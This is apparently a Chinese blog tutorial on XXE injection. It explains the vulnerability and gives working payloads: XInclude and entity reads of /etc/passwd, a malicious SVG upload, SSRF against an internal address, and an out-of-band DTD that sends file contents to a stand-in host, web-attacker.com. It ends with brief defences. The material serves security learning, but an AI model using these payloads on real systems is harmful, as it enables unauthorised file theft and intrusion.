• XXE外部实体注入漏洞总结

    XXE

      productId=1&storeId=1 ,当我们抓包分析数据时,有参数传递时,我们不仅要测是否存在sql注入,也可以看看是否有xxe。有时在前端是正常传数据,但是在服务器端就会将我们的参数值嵌入到了xml文档中进行解析,此时就有可能存在xxe漏洞。

    漏洞原理

      XXE是xml外部实体注入漏洞,应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行,内网端口扫描攻击内网网站等危害。

    漏洞危害

      1. 读取敏感文件。

      2. 执行ssrf漏洞,进行内网端口探测,攻击内网网站等。

    漏洞检测

      1. XInclude攻击

       一些应用程序接收用户的数据,在服务端嵌入到xml文档中解析。

       这时我们无法控制整个xml文档,所以就无法定义或修改DOCTYPE元素。XInclede是xml规范的一部分,允许从子文档中构建xml文档,从而进行攻击。

    直接将参数改为下面的值,
    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo> 

    原来的参数值就是 productId=1,我们怎么能知道在服务端嵌入到了xml文档中解析。所以,遇到这种参数,我们除了试一下sql注入,还能试是否存在xxe。

     

      2. 利用文件上传来进行xxe攻击

       docx和svg等都是基于xml格式,如果图像处理库支持SVG图像,攻击者可以提交恶意的SVG图像,就可以利用文件上传执行xxe攻击。

       创建具有xml代码的SVG图像

    <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

       将此图像上传上去。就可以在头像中看到/etc/hostname文件的内容。

      3. 通过修改请求包的文件内容类型来进行xxe攻击

       有些应用程序会允许xml的内容类型,我们就可以修改Content-Type: text/xml字段,来利用xxe漏洞。

    复制代码
    POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

    原来的请求体中的内容是:foo=bar
    复制代码

      4. 读取敏感文件

       利用file协议读取服务器中的敏感文件。

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    #在参数位置输入&xxe;就行。
<stockCheck><productId>&xxe;</productId></stockCheck>

      5. 执行ssrf攻击

       利用http协议,让存在xxe漏洞的应用程序向与它处于同一内网的发送http请求。

       也可以利用其他协议,例如:ftp ,data,等。

    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://192.168.1.1:3389"> ]>

       6. 带外通道技术来进行盲注xxe

       一般情况下,虽然存在xxe漏洞,但是不会回显外部实体注入的值,我们就要利用带外通道技术。(OOB)

      攻击者在vps中放置恶意的DTD,让存在漏洞的应用程序去访问。

    恶意DTD(外部实体)内容:访问http://web-attacker.com/malicious.dtd可以访问到改DTD
    <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

      向存在漏洞的应用程序中输入:

    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

      7. 通过错误消息读取文件从而利用盲注xxe。

       通过触发xml解析错误,在解析错误信息中返回我们需要读取的敏感信息。

    <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

    漏洞防御

      1. 使用开发语言提供的禁用外部实体的方法。

      2. 过滤用户输入的xml数据中的关键字。

      3. 不允许xml中有用户自定义的文档类型。

     

  • 相关阅读:
    spring boot + springcloud教程
    【2024.6.22】今日科技时事:科技前沿大事件
    webpack学习
    C语言基础算法复习
    JavaSE入门--初始Java
    Android 架构思想与 MVVM 框架封装
    【LeetCode每日一题】——136.只出现一次的数字
    Jenkins专栏(三)执行报错合集
    javaweb 之 Request 和 Response 常见案例 用户登录和注册
    python-(6-2)爬虫---小试牛刀,获得网页页面内容
  • 原文地址:https://www.cnblogs.com/syroot/p/15914826.html